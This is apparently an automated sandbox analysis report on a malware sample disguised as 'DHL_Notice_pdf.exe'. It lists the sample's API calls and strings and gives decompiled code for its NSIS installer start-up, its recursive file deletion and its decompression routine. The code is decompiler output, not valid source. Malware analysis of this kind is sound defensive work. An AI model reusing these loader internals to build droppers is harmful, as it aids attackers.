                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL_Notice_pdf.exe",00000020,"C:\Users\user\Desktop\DHL_Notice_pdf.exe",00000000), ref: 004037E9
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_Notice_pdf.exe",00000000,?), ref: 00403A8F
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL_Notice_pdf.exe,00420F08,00000001), ref: 00403B21
                                                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                            • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                            • OleUninitialize.OLE32(?), ref: 00403B71
                                                            • ExitProcess.KERNEL32 ref: 00403B8B
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                            • ExitWindowsEx.USER32 ref: 00403BFE
                                                            • ExitProcess.KERNEL32 ref: 00403C1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                            • String ID: "C:\Users\user\Desktop\DHL_Notice_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_Notice_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 2292928366-836459385
                                                            • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                            • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                            C-Code - Quality: 98%
                                                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                            0x00405d7e
                                                            0x00405d83
                                                            0x00405d8c
                                                            0x00405d8f
                                                            0x00405d97
                                                            0x00405d9a
                                                            0x00405d9d
                                                            0x00405da5
                                                            0x00405da7
                                                            0x00405da8
                                                            0x00000000
                                                            0x00405da8
                                                            0x00405db3
                                                            0x00405db6
                                                            0x00405db6
                                                            0x00405db6
                                                            0x00405dba
                                                            0x00405dcd
                                                            0x00405dd4
                                                            0x00405dd9
                                                            0x00405ddd
                                                            0x00405ded
                                                            0x00405ddf
                                                            0x00405de5
                                                            0x00405de5
                                                            0x00405df2
                                                            0x00405df6
                                                            0x00405e02
                                                            0x00405e08
                                                            0x00405e0d
                                                            0x00405e13
                                                            0x00405e1e
                                                            0x00405e24
                                                            0x00405e26
                                                            0x00405e29
                                                            0x00405ed3
                                                            0x00405ed3
                                                            0x00405ed7
                                                            0x00405ed9
                                                            0x00405ed9
                                                            0x00405ed9
                                                            0x00405ed9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e2f
                                                            0x00405e2f
                                                            0x00405e2f
                                                            0x00405e37
                                                            0x00405e57
                                                            0x00405e5f
                                                            0x00405e64
                                                            0x00405e6b
                                                            0x00405e86
                                                            0x00405e8b
                                                            0x00405e8d
                                                            0x00405eb1
                                                            0x00405e8f
                                                            0x00405e8f
                                                            0x00405e92
                                                            0x00405ea6
                                                            0x00405e94
                                                            0x00405e97
                                                            0x00405e9f
                                                            0x00405e9f
                                                            0x00405e92
                                                            0x00405e6d
                                                            0x00405e73
                                                            0x00405e75
                                                            0x00405e7b
                                                            0x00405e7b
                                                            0x00405e75
                                                            0x00000000
                                                            0x00405e6b
                                                            0x00405e39
                                                            0x00405e41
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e43
                                                            0x00405e4b
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e4d
                                                            0x00405e55
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405eb6
                                                            0x00405ebe
                                                            0x00405ec4
                                                            0x00405ec4
                                                            0x00405ecd
                                                            0x00000000
                                                            0x00405ecd
                                                            0x00405df8
                                                            0x00405e00
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405dbc
                                                            0x00405dbc
                                                            0x00405dbe
                                                            0x00405ede
                                                            0x00405ee0
                                                            0x00405ee3
                                                            0x00405f34
                                                            0x00405f34
                                                            0x00405f34
                                                            0x00405ee5
                                                            0x00405ee8
                                                            0x00405ef3
                                                            0x00405ef8
                                                            0x00405efa
                                                            0x00000000
                                                            0x00000000
                                                            0x00405efd
                                                            0x00405f09
                                                            0x00405f0e
                                                            0x00405f10
                                                            0x00000000
                                                            0x00405f2b
                                                            0x00405f12
                                                            0x00405f15
                                                            0x00000000
                                                            0x00000000
                                                            0x00405f1a
                                                            0x00000000
                                                            0x00405f21
                                                            0x00405eea
                                                            0x00405eea
                                                            0x00000000
                                                            0x00405eea
                                                            0x00405dc4
                                                            0x00405dc7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405dc7

                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,\*.*), ref: 00405DE5
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                                                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                            • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*$\*.*
                                                            • API String ID: 2035342205-3738162736
                                                            • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                            • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 631->635 632->619 634->578 635->602
                                                            C-Code - Quality: 98%
                                                            			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
